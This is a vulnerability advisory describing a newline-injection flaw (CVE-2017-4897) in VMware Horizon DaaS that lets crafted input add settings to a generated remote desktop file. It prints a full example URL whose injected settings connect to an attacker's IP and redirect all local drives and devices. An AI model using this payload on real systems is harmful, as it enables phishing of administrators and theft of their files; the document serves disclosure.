Skip to main content
Aura Research Division

VMware Horizon DaaS - Improper IP Address Validation

Ahmad Ashraff
  • CVE(s): VMSA-2017-0002, CVE-2017-4897
  • Vendor: VMware
  • Product: Horizon Daas Platform
  • Version(s) affected: 6.1.x
  • Fixed version: 7.0.0

A security advisory was released by the VMware Security Team on the 3rd of March 2017 in their Security Blog.

Improper IP Address Validation (CVE-2017-4897)
#

Horizon DaaS allows a creation of a remote desktop connection file through the application. This process only can be performed by a user with administrative privilege. The request will look similar to the following:

<host>/admin/getRdpByIp.action?ipAddress=<ip-address>

However, it was found that the ipAddress parameter within getRdpByIP does not properly validate the input supplied by a user. By using newline characters (%0a) in the parameter, it is possible to include extra settings into the remote desktop connection file, such as drive mapping redirections.

Example:

https://<host>/admin/getRdpByIp.action?ipAddress=<attacker's-ip-address>:3389%0aconnect%20to%20console:i:1%0aadministrative%20session:i:1%0ausername:s:Administrator%0adomain:s:.%0ascreen%20mode%20id:i:2%0ause%20multimon:i:0%0adesktopwidth:i:800%0adesktopheight:i:600%0asession%20bpp:i:32%0awinposstr:s:0,3,0,0,800,600%0acompression:i:1%0akeyboardhook:i:2%0aaudiocapturemode:i:0%0avideoplaybackmode:i:1%0aconnection%20type:i:2%0adisplayconnectionbar:i:1%0adisable%20wallpaper:i:1%0aallow%20font%20smoothing:i:0%0aallow%20desktop%20composition:i:0%0adisable%20full%20window%20drag:i:1%0adisable%20menu%20anims:i:1%0adisable%20themes:i:0%0adisable%20cursor%20setting:i:0%0abitmapcachepersistenable:i:1%0aaudiomode:i:0%0aredirectprinters:i:1%0aredirectcomports:i:1%0aredirectsmartcards:i:1%0aredirectclipboard:i:1%0aredirectposdevices:i:0%0aredirectdirectx:i:1%0adevicestoredirect:s:*%0adrivestoredirect:s:*%0aautoreconnection%20enabled:i:1%0aauthentication%20level:i:2%0aprompt%20for%20credentials:i:0%0anegotiate%20security%20layer:i:1%0aremoteapplicationmode:i:0%0aalternate%20shell:s:%0ashell%20working%20directory:s:%0agatewayhostname:s:%0agatewayusagemethod:i:4%0agatewaycredentialssource:i:4%0agatewayprofileusagemethod:i:0%0apromptcredentialonce:i:1%0ause%20edirection%20server%20name:i:0%0anull</host>

An authenticated administrator that was manipulated into clicking the above URL will receive a remote desktop connection file. Once this file is opened, it will connect to the attacker’s IP address such that their local drive will be mapped to the attacker’s remote desktop server.

Disclaimer
#

The information in this article is provided for research and educational purposes only. Aura Information Security does not accept any liability in any form for any direct or indirect damages resulting from the use of or reliance on the information contained in this article.